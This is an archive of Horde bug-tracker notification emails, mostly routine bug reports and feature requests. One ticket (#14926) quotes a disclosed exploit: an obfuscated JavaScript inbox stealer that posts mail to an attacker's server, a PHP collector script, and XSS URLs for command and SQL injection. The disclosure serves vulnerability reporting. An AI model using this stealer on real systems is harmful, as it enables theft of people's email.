From noreply at bugs.horde.org Mon May 3 20:00:11 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:11 -0000 Subject: [Tickets #15058] Custom header key field not required Message-ID: BITTE NICHT AUF DIESE NACHRICHT ANTWORTEN. NACHRICHTEN AN DIESE E-MAIL-ADRESSE WERDEN NICHT GELESEN. Ticket-URL: https://bugs.horde.org/ticket/15058 ------------------------------------------------------------------------------ Ticket | 15058 Erstellt Von | patrick.kratzer at hetzner.com Zusammenfassung | Custom header key field not required Warteschlange | Ingo Version | Git master Typ | Bug Status | Unconfirmed Priorität | 2. Medium Milestone | Patch | Zuständige | ------------------------------------------------------------------------------ patrick.kratzer at hetzner.com (2021-04-09 12:02) hat geschrieben: When filtering by a custom header, it is not required to set the key. This causes the sieve rule to look like this: [...] if Keine E-Mail-Köpfe angegeben { [...] This can't be processed by the LTMP server then and even inhibits other filters in some systems. Making the key field required should solve this issue. From noreply at bugs.horde.org Mon May 3 20:00:14 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:14 -0000 Subject: [Tickets #14926] Re: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22 In-Reply-To: References: Message-ID: <20210330034827.Horde.PgaFNPtFae6EUg_V-8liG0V@bugs.horde.org> DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/14926 ------------------------------------------------------------------------------ Ticket | 14926 Updated By | accreditation at di.mil.za Summary | Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing | Emails <= v5.2.22 Queue | Horde Groupware Version | 5.2.22 Type | Bug State | Resolved Priority | 3. High Milestone | Patch | Owners | ------------------------------------------------------------------------------ accreditation at di.mil.za (2021-03-30 03:48) wrote: > # Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22 > # Date: 14.04.2019 > # Author: InfinitumIT > # Vendor Homepage: https://www.horde.org/ > # Version: Up to v5.2.22. > # info at infinitumit.com.tr && infinitumit.com.tr > # PoC: https://numanozdemir.com/respdisc/horde/horde.mp4 > > # Description: > # Attacker can combine "CSRF vulnerability in Trean Bookmarks > (defaultly installed on Horde Groupware)" and > # "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" > vulnerabilities to steal victim's emails. > > # Also: > # Attacker can use 3 different reflected XSS vulnerability to > exploit Remote Command Execution, SQL Injection and Code Execution. > # To steal e-mails, attacker will send an e-mail to victim and > victim will click the attacker's website. So, victim's inbox will be > dumped in attacker's FTP. > # All of them vulnerabillities are valid for all Horde Webmail versions. > > # Attacker will exploit the CSRF and XSS with: index.html > # Attacker will steal and post the emails with: stealer.js > # Attacker will save the emails with: stealer.php > > # index.html Codes: > > > > > # stealer.js Codes: > eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105, > 111,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,1 > 16,101,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121)) > // It is charcoded, firstly decode and edit for yourself then encode > again. Also dont forget to remove spaces! > > > # stealer.php Codes: > > > header('Access-Control-Allow-Origin: *'); > > header('Access-Control-Allow-Headers: *'); > > if($_POST['inbox']){ > > $logs = fopen("inbox.txt", "a+"); > > $data = $_POST['inbox']." > ----------------------------------------------------------------- > ".chr(13).chr(10).chr(13).chr(10); > fwrite($logs, $data); > > } > > > ?> > > # > _____________________________________________________________________________________________________ > > # Reflected XSS to Remote Command Execution, Remote Code Execution > and SQL Injection > > > http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f > http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f > http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE > > # Attacker can execute commands & PHP codes remotely and inject > harmful SQL queries. Also, attacker can create users too with those > reflected XSS vulnerabilities. > > # Stay Secure with InfinitumIT - infinitumit.com.tr From noreply at bugs.horde.org Mon May 3 20:00:23 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:23 -0000 Subject: [Incidencias #15060] Some PDF attached is corrupted Message-ID: NO CONTESTE A ESTE MENSAJE. ESTA DIRECCIÓN NO SE CONSULTA. URL de la incidencia: https://bugs.horde.org/ticket/15060 ------------------------------------------------------------------------------ Incidencia | 15060 Creada por | info at callejondelpozo.es Resumen | Some PDF attached is corrupted Cola | IMP Versión | Git master Tipo | Bug Estado | Unconfirmed Prioridad | 3. High Milestone | Patch | Propietarios | ------------------------------------------------------------------------------ info at callejondelpozo.es (2021-04-16 16:02) escribió: When I attatch a pdf on webmail horde (With Webmail Horde or Round Cube Client, is indiferent) the pdf sended is corrupted. Please, check the .rar with screenshots and.. could you help me? https://webmail.callejondelpozo.es/ thanks! info at callejondelpozo.es (2021-04-16 16:02) cargado: results.rar https://bugs.horde.org/h/services/download/?app=whups&actionID=download_file&file=results.rar&ticket=15060&fn=%2Fresults.rar From noreply at bugs.horde.org Mon May 3 20:00:23 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:23 -0000 Subject: [Tickets #15015] Re: Add Attachements With Dug and Drop In-Reply-To: References: Message-ID: <20210416173050.Horde.3cxEL5_wB2Hyh7fGTjAze4b@bugs.horde.org> BITTE NICHT AUF DIESE NACHRICHT ANTWORTEN. NACHRICHTEN AN DIESE E-MAIL-ADRESSE WERDEN NICHT GELESEN. Ticket-URL: https://bugs.horde.org/ticket/15015 ------------------------------------------------------------------------------ Ticket | 15015 Aktualisiert Von | wahnes at uni-koeln.de Zusammenfassung | Add Attachements With Dug and Drop Warteschlange | DIMP Version | HEAD Typ | Bug Status | Unconfirmed Priorität | 1. Low Milestone | Patch | Zuständige | ------------------------------------------------------------------------------ wahnes at uni-koeln.de (2021-04-16 17:30) hat geschrieben: This is a duplicate of bug #14811 From noreply at bugs.horde.org Mon May 3 20:00:47 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:47 -0000 Subject: [Tickets #15055] link_attach_size_hard doesn't work Message-ID: DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/15055 ------------------------------------------------------------------------------ Ticket | 15055 Created By | benedetto.vassallo at unipa.it Summary | link_attach_size_hard doesn't work Queue | IMP Version | 6.2.27 Type | Bug State | Unconfirmed Priority | 2. Medium Milestone | Patch | Owners | ------------------------------------------------------------------------------ benedetto.vassallo at unipa.it (2021-03-19 12:14) wrote: I have configured my imp installation (for test) witk this parameters: $conf['compose']['use_vfs'] = true; $conf['compose']['link_attachments'] = true; $conf['compose']['link_attachments_notify'] = false; $conf['compose']['link_attach_threshold'] = 4096; $conf['compose']['link_attach_size_limit'] = 0; $conf['compose']['link_attach_size_hard'] = 81920; $conf['compose']['attach_size_limit'] = 0; $conf['compose']['attach_count_limit'] = 0; in order to get all attachment linked if the sum of them is bigger than 80K. If I send an e-mail with an attachment smaller than 4K it is send ad normal attachment. But if I send an e-mail whit an attachment bigger than 80K or with 2 attachments (1 smaller than 4K and 1 bigger than 80K) I get an "error when communicating with the server" red rectangle and in the log I get this error: 2021-03-08T10:26:09+00:00 EMERG: HORDE [imp] Call to a member function setRaw() on null [pid 12209 on line 2929 of "/var/www/horde5/imp/lib/Compose.php"] From noreply at bugs.horde.org Mon May 3 20:00:50 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:50 -0000 Subject: [Tickets #15056] Wrong MIME type on address book exports Message-ID: BITTE NICHT AUF DIESE NACHRICHT ANTWORTEN. NACHRICHTEN AN DIESE E-MAIL-ADRESSE WERDEN NICHT GELESEN. Ticket-URL: https://bugs.horde.org/ticket/15056 ------------------------------------------------------------------------------ Ticket | 15056 Erstellt Von | wahnes at uni-koeln.de Zusammenfassung | Wrong MIME type on address book exports Warteschlange | Turba Version | FRAMEWORK_5_2 Typ | Bug Status | Unconfirmed Priorität | 2. Medium Milestone | Patch | 1 Zuständige | ------------------------------------------------------------------------------ wahnes at uni-koeln.de (2021-03-25 00:10) hat geschrieben: When employing Turba's Import/Export feature to export an address book using the vCard format (either version 2 or 3), the downloaded file's MIME type is wrong. The HTTP header will be Content-Type: text/calendar when it should be Content-Type: text/vcard While a wrong MIME type normally is not the most important thing on earth, it can have some undesired results. When this is combined with "no browser sniffing" headers (i.e. "X-Content-Type-Options: nosniff"), some browsers will not simply adopt the filename suggested by the "Content-Disposition" header's filename field, which would read "contacts.vcf" in this case. Instead, the browser will suggest saving the file as "contacts.ics" because it has been declared an iCalendar file (text/calendar). This in turn will be irritating for non-tech-savvy users, as a file with this name will not be automatically imported by a local contact management software. The reason for the wrong MIME type seems to be that the "Horde_Data_Vcard" class inherits directly from "Horde_Data_Imc". The Horde_Data_Imc's "exportFile" method always uses the "text/calendar" MIME type when making files available for download. I saw in the neighboring Horde_Data_Csv class that there is a field called "_contentType" which may allow not to duplicate Horde_Data_Imc's exportFile method for use with Horde_Data_Vcard, but merely adjust the MIME type when downloading. However, my practical knowledge of PHP's object model and is not sufficient to actually make use of non-duplicated code here. As a result, the attached patch is probably not the right way to do it, but it does solve the problem at hand. wahnes at uni-koeln.de (2021-03-25 00:10) hat hochgeladen: turba-mime-typ-vcard-export.patch https://bugs.horde.org/h/services/download/?app=whups&actionID=download_file&file=turba-mime-typ-vcard-export.patch&ticket=15056&fn=%2Fturba-mime-typ-vcard-export.patch From noreply at bugs.horde.org Mon May 3 20:00:54 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:00:54 -0000 Subject: [Tickets #15057] Problem with initial setup Message-ID: DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/15057 ------------------------------------------------------------------------------ Ticket | 15057 Created By | pedja at etron.rs Summary | Problem with initial setup Queue | Horde.org Servers Version | PEAR server Type | Bug State | Unconfirmed Priority | 1. Low Milestone | Patch | Owners | ------------------------------------------------------------------------------ pedja at etron.rs (2021-04-03 02:45) wrote: Hi, i am trying to install horde with pear . i have tryed few times , and error is : Warning: require_once(/var/www/horde/Horde/Autoloader/Default.php): failed to open stream: No such file or directory in /var/www/horde/lib/core.php on line 49 Fatal error: require_once(): Failed opening required '/var/www/horde/Horde/Autoloader/Default.php' (include_path='/var/www/horde/lib:.:') in /var/www/horde/lib/core.php on line 49 dir Autoloader/ does not exist. i also have a proble with creating a database. i can not find sql for database creation. i have succesefully install one server 2 years ago and works perfectly and now i have a problem. From noreply at bugs.horde.org Mon May 3 20:01:03 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:01:03 -0000 Subject: [Tickets #15059] Right click to color messages and folders Message-ID: DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/15059 ------------------------------------------------------------------------------ Ticket | 15059 Created By | cbx.mail at protonmail.com Summary | Right click to color messages and folders Queue | Horde Groupware Webmail Edition Version | 5.2.22 Type | Enhancement State | New Priority | 1. Low Milestone | Patch | Owners | ------------------------------------------------------------------------------ cbx.mail at protonmail.com (2021-04-09 16:31) uploaded: colorcoded_inbox.png https://bugs.horde.org/h/services/download/?app=whups&actionID=download_file&file=colorcoded_inbox.png&ticket=15059&fn=%2Fcolorcoded_inbox.png From noreply at bugs.horde.org Mon May 3 20:01:31 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Mon, 03 May 2021 20:01:31 -0000 Subject: [Tickets #14964] Re: Postgresql12 dropped adsrc In-Reply-To: References: Message-ID: <20210414075212.Horde.5lZPWakzNA5GIFafgOLsApY@bugs.horde.org> DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/14964 ------------------------------------------------------------------------------ Ticket | 14964 Updated By | guillaume at demillecamps.be Summary | Postgresql12 dropped adsrc Queue | Components Type | Bug State | Unconfirmed Priority | 1. Low Milestone | Patch | Owners | ------------------------------------------------------------------------------ guillaume at demillecamps.be (2021-01-19 08:37) wrote: is there any progress on this ??..... thank you ! From noreply at bugs.horde.org Wed May 5 07:27:30 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Wed, 05 May 2021 07:27:30 +0000 Subject: [Tickets #15064] templates for answers Message-ID: BITTE NICHT AUF DIESE NACHRICHT ANTWORTEN. NACHRICHTEN AN DIESE E-MAIL-ADRESSE WERDEN NICHT GELESEN. Ticket-URL: https://bugs.horde.org/ticket/15064 ------------------------------------------------------------------------------ Ticket | 15064 Erstellt Von | patrick.kratzer at hetzner.com Zusammenfassung | templates for answers Warteschlange | IMP Version | Git master Typ | Enhancement Status | New Priorität | 2. Medium Milestone | Patch | Zuständige | ------------------------------------------------------------------------------ patrick.kratzer at hetzner.com (2021-05-05 07:27) hat geschrieben: It would be beneficial if using the stored templates for mail answers would also possible. This is also possible in some other mail applications like Outlook or Office 365. From noreply at bugs.horde.org Sun May 9 13:17:46 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Sun, 09 May 2021 13:17:46 +0000 Subject: [Tickets #15065] Error when deleting book marks. Message-ID: DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/15065 ------------------------------------------------------------------------------ Ticket | 15065 Created By | benmtl at gmail.com Summary | Error when deleting book marks. Queue | Horde Groupware Version | 5.2.22 Type | Bug State | Unconfirmed Priority | 1. Low Milestone | Patch | Owners | ------------------------------------------------------------------------------ benmtl at gmail.com (2021-05-09 13:17) wrote: After importing my bookmarks, when I try to delete one I get a 404 erorr. "Not Found The requested URL was not found on this server. Apache/2.4.38 (Debian) Server at 192.168.1.33 Port 80" This is the url it is looking for: http://192.168.1.33/trean/b/delete Not sure if it is an issue with my install or with the book mark module. From noreply at bugs.horde.org Sun May 9 13:18:18 2021 From: noreply at bugs.horde.org (noreply at bugs.horde.org) Date: Sun, 09 May 2021 13:18:18 +0000 Subject: [Tickets #15065] Re: Error when deleting book marks. In-Reply-To: References: Message-ID: <20210509131818.Horde.Rm5aSsyuWYaas_a7zkZ6B-J@bugs.horde.org> DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED. Ticket URL: https://bugs.horde.org/ticket/15065 ------------------------------------------------------------------------------ Ticket | 15065 Updated By | benmtl at gmail.com Summary | Error when deleting book marks. Queue | Horde Groupware Version | 5.2.22 Type | Bug State | Unconfirmed Priority | 1. Low Milestone | Patch | Owners | ------------------------------------------------------------------------------ benmtl at gmail.com (2021-05-09 13:17) wrote: After importing my bookmarks, when I try to delete one I get a 404 erorr. "Not Found The requested URL was not found on this server. Apache/2.4.38 (Debian) Server at 192.168.1.33 Port 80" This is the url it is looking for: http://192.168.1.33/trean/b/delete Not sure if it is an issue with my install or with the book mark module.